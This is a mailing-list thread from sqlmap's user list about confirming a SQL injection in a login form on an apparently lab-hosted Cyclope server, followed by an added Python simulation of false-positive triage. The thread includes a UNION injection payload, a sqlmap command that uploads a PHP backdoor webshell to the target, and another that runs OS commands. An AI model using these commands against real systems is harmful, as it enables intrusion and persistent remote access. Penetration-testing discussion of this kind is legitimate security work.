Re: [sqlmap-users] File Write Error
From: Brandon P. <bpe...@gm...> - 2014-03-21 18:16:25
Brian, I expect the program is taking the input for username and truncating it, so ZAP sees the injection going in and a successful auth afterwards and assumes the payload worked. I think this is a poor assumption to make.

On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <mir...@gm...> wrote:

> There is always a 302 redirect, so I am not sure how ZAP detected this as
> a SQLi.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hu...> wrote:
>
>> Thanks for the quick response, Miroslav and Bernardo. It's very much
>> appreciated! There is a UNION technique that is being reported by ZAP, but
>> sqlmap isn't finding it and I haven't quite figured out how to simply tell
>> it what to use explicitly. ZAP detects a UNION vulnerability on
>> activate.php:
>>
>>
>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>
>> My attempts to input this have not been successful, so I'm not sure if
>> it's a false positive or I'm not using sqlmap quite right (more likely).
>>
>> CMDLINE
>> sqlmap -u "http://172.16.71.138:7879/activate.php"
>> --data='act=auth-login&page=login&username=admin&password=admin' -p
>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>> progra~1/cyclope/ni4zlja=/backdoor.php --prefix="'" --suffix="UNION ALL
>> select NULL --"
>>
>> As for the previous method, here's the attached file (on screen output
>> was massive - password is "password"). End result "[09:01:51] [CRITICAL]
>> all tested parameters appear to be not injectable. Also, you can try to
>> rerun by providing either a valid value for option '--string' (or
>> '--regexp')"
>>
>> Thanks for the help!
>>
>> Brian
>>
>>
>>
>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
>> ber...@gm...> wrote:
>>
>>> On 21 March 2014 11:57, Bernardo Damele A. G. <ber...@gm...>
>>> wrote:
>>> > [...]
>>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>>> > first to sync to the GitHub repository) with the following syntax:
>>>
>>> Command line:
>>>
>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php"
>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>>> --parse-errors -t traffic.log --answers "language does the web server
>>> support=4,do you want to use for writable=2,comma separate list of
>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>
>>> Feel free to report back the result, the entire standard output of
>>> sqlmap and send me the traffic.log.
>>>
>>> Thank you.
>>> Bernardo
>>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
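
Added example (not part of the original thread, and not sqlmap or ZAP code): an offline simulation of the truncation hypothesis in the reply above, showing why a redirect seen after sending the payload is weak evidence and how comparing against an inert control request separates a real finding from a false positive. The handler, the 3-character truncation, the ZAP/ZAP account and the redirect targets are assumptions made for illustration.

```python
from urllib.parse import parse_qs, urlencode

MAX_USERNAME = 3             # assumed truncation length (hypothetical)
ACCOUNTS = {"ZAP": "ZAP"}    # constructed account, so the truncated name authenticates

def handle_login(body):
    """Hypothetical stand-in for the login handler; returns (status, Location)."""
    form = parse_qs(body, keep_blank_values=True)
    username = form.get("username", [""])[0][:MAX_USERNAME]   # input silently truncated
    password = form.get("password", [""])[0]
    ok = ACCOUNTS.get(username) == password   # plain lookup: input never reaches a query
    # Every login attempt is answered with a redirect, as noted in the thread.
    # The two Location values are assumed names.
    return 302, ("index.php" if ok else "index.php?pag=login")

def naive_verdict(payload_body):
    """Weak heuristic: payload sent, redirect came back, so report a finding."""
    status, _location = handle_login(payload_body)
    return status == 302

def inert_control(payload_body):
    """Same request, but everything from the first quote on replaced by inert padding."""
    form = {k: v[0] for k, v in parse_qs(payload_body, keep_blank_values=True).items()}
    head, _quote, tail = form["username"].partition("'")
    form["username"] = head + "x" * (len(tail) + 1)
    return urlencode(form)

def triage(payload_body):
    """Keep a finding only if the payload changes the response versus the control."""
    if handle_login(payload_body) == handle_login(inert_control(payload_body)):
        return "unconfirmed"
    return "needs manual review"

# Request body reported by ZAP, copied from the thread.
ZAP_BODY = ("act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+"
            "&password=ZAP")

if __name__ == "__main__":
    print("naive heuristic flags it:", naive_verdict(ZAP_BODY))
    print("differential triage     :", triage(ZAP_BODY))
```
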